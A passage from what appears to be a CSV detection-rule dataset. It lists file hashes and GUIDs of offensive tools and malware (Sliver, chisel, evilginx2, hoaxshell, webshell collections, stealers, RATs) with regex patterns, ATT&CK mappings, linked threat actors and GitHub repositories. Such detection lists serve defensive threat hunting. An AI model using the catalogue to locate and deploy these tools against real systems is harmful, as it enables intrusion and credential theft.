framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31625" "*98f7e2c5724e79af170510f1f694fb61181ea985d4964286ca3865e2e0de690d*",".{0,1000}98f7e2c5724e79af170510f1f694fb61181ea985d4964286ca3865e2e0de690d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31626" "*98fa9af535fd48260a65e18ceb9553187786742c6c77486bb27e5fe61758ea77*",".{0,1000}98fa9af535fd48260a65e18ceb9553187786742c6c77486bb27e5fe61758ea77.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","31628" "*98fd92a470168082d4a64840e28e80f6cc114969d1f9c9deb2bc9585438ba9e2*",".{0,1000}98fd92a470168082d4a64840e28e80f6cc114969d1f9c9deb2bc9585438ba9e2.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","31629" "*99$1a7F1qr2HihoXfs/56u5XMdpDZ83N6hW/HI=*",".{0,1000}99\$1a7F1qr2HihoXfs\/56u5XMdpDZ83N6hW\/HI\=.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","31631" "*990953dcf64c26cb505d9c19202b849c7f7131209cba13665e91ef500fc266eb*",".{0,1000}990953dcf64c26cb505d9c19202b849c7f7131209cba13665e91ef500fc266eb.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","31633" "*990d5ff1bf1055bd4796de41e1fc6a31dbe60d11e15e64f1eb46cde01fbb4c68*",".{0,1000}990d5ff1bf1055bd4796de41e1fc6a31dbe60d11e15e64f1eb46cde01fbb4c68.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31634" "*9915aa1e343c454c31a1011d51fa3f3410a54cc70256d232d2b7a00bd1bd5583*",".{0,1000}9915aa1e343c454c31a1011d51fa3f3410a54cc70256d232d2b7a00bd1bd5583.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional 
Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","31636" "*99164a220ff13f15d76096ec91b472b2ed8fd5670491f5baf073158b92e11374*",".{0,1000}99164a220ff13f15d76096ec91b472b2ed8fd5670491f5baf073158b92e11374.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31637" "*99187ebc1fadec7a7fdcd0a201d75776efb53514fa56b515cab6ca6e2783a402*",".{0,1000}99187ebc1fadec7a7fdcd0a201d75776efb53514fa56b515cab6ca6e2783a402.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31638" "*991f1ee0d29a4829661bd53b2cb04810c416466b74b190e6627fe99367ef24cc*",".{0,1000}991f1ee0d29a4829661bd53b2cb04810c416466b74b190e6627fe99367ef24cc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31641" "*99238bd3e1c0637041c737c86a05bd73a9375abc9794dca71d2765e22d87537e*",".{0,1000}99238bd3e1c0637041c737c86a05bd73a9375abc9794dca71d2765e22d87537e.{0,1000}","offensive_tool_keyword","winexe","Winexe 
remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#filehash #linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","31642" "*99292BAC-72B4-4AAB-9E5F-2BC1843C8EA3*",".{0,1000}99292BAC\-72B4\-4AAB\-9E5F\-2BC1843C8EA3.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#GUIDproject","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","31643" "*992bbf36c83f56d459a79cd34638f7ba932ad4a313eb9a63c8a8cf111ef9497b*",".{0,1000}992bbf36c83f56d459a79cd34638f7ba932ad4a313eb9a63c8a8cf111ef9497b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31644" "*99314a42485888cb1cf7197f43bccc1d285b116f7ec936fdf75a354df21376e6*",".{0,1000}99314a42485888cb1cf7197f43bccc1d285b116f7ec936fdf75a354df21376e6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31645" "*99333bd2aadc9ebdbeb842981f1bb054f2102cdb94e77a0a8d7588cabaf70dc6*",".{0,1000}99333bd2aadc9ebdbeb842981f1bb054f2102cdb94e77a0a8d7588cabaf70dc6.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege 
escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","31646" "*99383be21201b97e739e06f5c89a815cd4a296030985505f238862aecbbb7a77*",".{0,1000}99383be21201b97e739e06f5c89a815cd4a296030985505f238862aecbbb7a77.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","#filehash","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","31647" "*993cae56bdedd0dfb86e91e00180f0162fd0e79c6ee22f15fefdfbf1e10cf5f6*",".{0,1000}993cae56bdedd0dfb86e91e00180f0162fd0e79c6ee22f15fefdfbf1e10cf5f6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31648" "*993e5580a5eecf984fad97f7925ee12f86f83f1088b56dd71645bf6deb97118c*",".{0,1000}993e5580a5eecf984fad97f7925ee12f86f83f1088b56dd71645bf6deb97118c.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","31649" 
"*9941d3f3192d927be91b38a3d13e40aebe91768185bc237ef798ae20f78dd952*",".{0,1000}9941d3f3192d927be91b38a3d13e40aebe91768185bc237ef798ae20f78dd952.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31650" "*994377bab9392a6bac39023cd24df98efbb668cef42ff5bbd709a165fc7a3fe3*",".{0,1000}994377bab9392a6bac39023cd24df98efbb668cef42ff5bbd709a165fc7a3fe3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31651" "*994ed2ac2d66ee84fae1b9b57e606ddd876ad714c3fb7a4a882c10da7d0b2332*",".{0,1000}994ed2ac2d66ee84fae1b9b57e606ddd876ad714c3fb7a4a882c10da7d0b2332.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31652" "*9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae*",".{0,1000}9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","#filehash","N/A","10","","N/A","","","","31653" 
"*995c3ae92109046bd3bc58025b09d449a695a82b1bf5102b96091500419aabdb*",".{0,1000}995c3ae92109046bd3bc58025b09d449a695a82b1bf5102b96091500419aabdb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31654" "*995e755827bf8c1908e64d40a7851e05706b89e41dee63037e5c4be0b61f113e*",".{0,1000}995e755827bf8c1908e64d40a7851e05706b89e41dee63037e5c4be0b61f113e.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","31656" "*995f304132e68eb63d3901bb9e672853eb36859aece625983c4ed690ccf2bcd8*",".{0,1000}995f304132e68eb63d3901bb9e672853eb36859aece625983c4ed690ccf2bcd8.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","31657" 
"*9961a0915b6362a73731987d5fc72db0ff44f744af9513ebe8e9935cd48709b8*",".{0,1000}9961a0915b6362a73731987d5fc72db0ff44f744af9513ebe8e9935cd48709b8.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","31658" "*9968434b0a2d9a4fbc85a732f8b5feb3937a9851e7eb4491966747ea188746da*",".{0,1000}9968434b0a2d9a4fbc85a732f8b5feb3937a9851e7eb4491966747ea188746da.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31659" "*996b73993b6dfdb1d34ab51c5c36dbae12cae353cfab25cbf14b6d974613cdef*",".{0,1000}996b73993b6dfdb1d34ab51c5c36dbae12cae353cfab25cbf14b6d974613cdef.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31660" "*996d133f79b2762f547dcd6900326835517586359ffe5f443c40336983a9a2e7*",".{0,1000}996d133f79b2762f547dcd6900326835517586359ffe5f443c40336983a9a2e7.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC 
safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","#filehash","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","31661" "*996e6455c47cdc9a046beeea068f06a9fe2c88d45d13fd055145aadecf23657e*",".{0,1000}996e6455c47cdc9a046beeea068f06a9fe2c88d45d13fd055145aadecf23657e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31662" "*996e7473634a2b894f6e154073d780b12f9ef1b8f1471bb945c7c2cf1c56010a*",".{0,1000}996e7473634a2b894f6e154073d780b12f9ef1b8f1471bb945c7c2cf1c56010a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31663" 
"*99775a584cbe0d578bfe061143714ca20bf561703c106508642308097c50270a*",".{0,1000}99775a584cbe0d578bfe061143714ca20bf561703c106508642308097c50270a.{0,1000}","offensive_tool_keyword","Invoke-s4u2self","A tool that abuses s4u2self to gain access to remote hosts","T1550.002 - T1557.001","TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-s4u2self","1","0","#filehash","N/A","9","1","5","2","2025-02-13T16:27:51Z","2023-09-14T13:31:05Z","31667" "*997969303538ff70c0e90e33789b0ef3da25556349c7017aac86dd1ad3b9264d*",".{0,1000}997969303538ff70c0e90e33789b0ef3da25556349c7017aac86dd1ad3b9264d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31668" "*997cd811395cfa507c03ba12937f1b8b767f03c146de3771f3fdf66ed2f821c1*",".{0,1000}997cd811395cfa507c03ba12937f1b8b767f03c146de3771f3fdf66ed2f821c1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31669" "*9980d0e503ffda2d4e254f2039bb6c5d7534d107178a2b4d871685ce6a899c05*",".{0,1000}9980d0e503ffda2d4e254f2039bb6c5d7534d107178a2b4d871685ce6a899c05.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","31671" "*99852761bd4acc0025c07c147c56caa540b7731be755254e9c85b82f25e08057*",".{0,1000}99852761bd4acc0025c07c147c56caa540b7731be755254e9c85b82f25e08057.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31673" "*998bc352eb5e3500805741cc3a82c1b9bccc3f66e9512e61f83a9d98850df16d*",".{0,1000}998bc352eb5e3500805741cc3a82c1b9bccc3f66e9512e61f83a9d98850df16d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31674" "*9994297041105099a5d6870a6d0f1ac5f53035758b053349a76007a3d74ff93d*",".{0,1000}9994297041105099a5d6870a6d0f1ac5f53035758b053349a76007a3d74ff93d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31675" "*99a0e78b14a0147999489e76b275e0a4503b03ed682cb382338a19472123b74d*",".{0,1000}99a0e78b14a0147999489e76b275e0a4503b03ed682cb382338a19472123b74d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31676" "*99a342f4ec5b86e7d657a933f5f56aeccd9f540193501b3fc6d6c8cac8c4bde4*",".{0,1000}99a342f4ec5b86e7d657a933f5f56aeccd9f540193501b3fc6d6c8cac8c4bde4.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31677" "*99a5f42e-60a8-4f1e-9dff-35443b972707*",".{0,1000}99a5f42e\-60a8\-4f1e\-9dff\-35443b972707.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","0","#GUIDProject","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","31678" "*99a69aea8e1d16454978e00c72b8cf8515faff75c5ffa3f42bc28ee0d51b1252*",".{0,1000}99a69aea8e1d16454978e00c72b8cf8515faff75c5ffa3f42bc28ee0d51b1252.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - 
T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","31679" "*99ab49eb94283378c7390bae6943b7b699ebd2ef3d560e5892967559e9429b7b*",".{0,1000}99ab49eb94283378c7390bae6943b7b699ebd2ef3d560e5892967559e9429b7b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31680" "*99ac2e0be445506852788ae9ed8f2deaecd39da027818c4530206ca9695e2002*",".{0,1000}99ac2e0be445506852788ae9ed8f2deaecd39da027818c4530206ca9695e2002.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31681" "*99ac9fc0ce4d52878179cfaf785234760ccdd11447fc596f3b04a2499eb31940*",".{0,1000}99ac9fc0ce4d52878179cfaf785234760ccdd11447fc596f3b04a2499eb31940.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","31682" "*99b12a9b146fcbb55353957845dd82e4d809b7626a6438fa46df5c1ba315c45d*",".{0,1000}99b12a9b146fcbb55353957845dd82e4d809b7626a6438fa46df5c1ba315c45d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered 
Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31683" "*99b151997a57f29a3e3436bb4ebbe4357219ae0694a9ae6561afa2da568a0768*",".{0,1000}99b151997a57f29a3e3436bb4ebbe4357219ae0694a9ae6561afa2da568a0768.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31684" "*99b685e2a57dbbdb0b53689aec5eef525a632c9ea00a5a16adb939387bf5a4da*",".{0,1000}99b685e2a57dbbdb0b53689aec5eef525a632c9ea00a5a16adb939387bf5a4da.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","#filehash","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","31685" 